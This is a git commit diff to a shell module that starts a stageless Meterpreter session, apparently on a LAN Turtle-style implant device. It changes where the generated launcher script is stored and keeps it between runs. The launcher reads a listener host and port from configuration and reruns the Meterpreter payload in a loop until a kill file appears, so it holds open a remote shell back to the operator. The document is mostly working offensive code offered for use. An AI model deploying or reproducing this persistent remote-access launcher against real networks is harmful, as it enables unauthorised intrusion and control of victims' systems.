Friendlier meterpreter_sl
Adds if/else so it doesn't do tons of writing every time the module is run

diff --git a/modules/meterpreter_sl b/modules/meterpreter_sl
--- a/modules/meterpreter_sl
+++ b/modules/meterpreter_sl
@@ -11,35 +11,43 @@ AUTHOR=IMcPwn
 : ${DIALOG_ESC=255}
 
 function start {
- if [ -s /etc/config/meterpreter_sl ]
+  if [ -s /etc/config/meterpreter_sl ]
   then
-    rm /tmp/meterpreter_sl_exec
-    touch /tmp/meterpreter_sl_exec
-    chmod +x /tmp/meterpreter_sl_exec
+    if [ -x /etc/turtle/meterpreter/meterpreter_sl_exec ]
+    then
+        echo "/etc/turtle/meterpreter/meterpreter_sl_exec" | at now
+        echo "Stageless Meterpreter started with pid:"
+        pidof meterpreter_sl
+    else
+        mkdir /etc/turtle/meterpreter
+        rm /etc/turtle/meterpreter/meterpreter_sl_exec
+        touch /etc/turtle/meterpreter/meterpreter_sl_exec
+        chmod +x /etc/turtle/meterpreter/meterpreter_sl_exec
 
-    echo '''#!/bin/bash
-    rm /tmp/killmeterpreter_sl
-    DATE=$(date)
-    IP=$(uci get meterpreter_sl.host)
-    PORT=$(uci get meterpreter_sl.port)
-    DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
-    [[ "$IP" == "" || "$PORT" == "" ]] && {
-    logger "Meterpreter: Error, configuration blank"
-    echo "Meterpreter: Error, configuration blank"
-    } || {
-    while [ ! -f /tmp/killmeterpreter_sl ]; do
-    echo "Started Stageless Meterpreter at $DATE with $IP $PORT"
-    logger "Stageless Meterpreter: Started at $DATE with $IP $PORT"
-    /usr/bin/meterpreter_sl $IP $PORT
-    done
-    rm /tmp/killmeterpreter_sl
-    echo "Stopped Stageless Meterpreter at $DATE with $IP $PORT"
-    logger "Stageless Meterpreter: Stopped at $DATE with $IP $PORT"
-    }''' > /tmp/meterpreter_sl_exec
+        echo '''#!/bin/bash
+        rm /tmp/killmeterpreter_sl
+        DATE=$(date)
+        IP=$(uci get meterpreter_sl.host)
+        PORT=$(uci get meterpreter_sl.port)
+        DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
+        [[ "$IP" == "" || "$PORT" == "" ]] && {
+        logger "Stageless Meterpreter: Error, configuration blank"
+        echo "Stagelss Meterpreter: Error, configuration blank"
+        } || {
+        while [ ! -f /tmp/killmeterpreter_sl ]; do
+        echo "Started Stageless Meterpreter at $DATE with $IP $PORT"
+        logger "Stageless Meterpreter: Started at $DATE with $IP $PORT"
+        /usr/bin/meterpreter_sl $IP $PORT
+        done
+        rm /tmp/killmeterpreter_sl
+        echo "Stopped Stageless Meterpreter at $DATE with $IP $PORT"
+        logger "Stageless Meterpreter: Stopped at $DATE with $IP $PORT"
+        }''' > /etc/turtle/meterpreter/meterpreter_sl_exec
 
-    echo "/tmp/meterpreter_sl_exec" | at now 
-    echo "Stageless Meterpreter started with pid:"
-    pidof meterpreter_sl
+        echo "/etc/turtle/meterpreter/meterpreter_sl_exec" | at now
+        echo "Stageless Meterpreter started with pid:"
+        pidof meterpreter_sl
+    fi
  else
     echo "Stageless Meterpreter not configured"
   fi
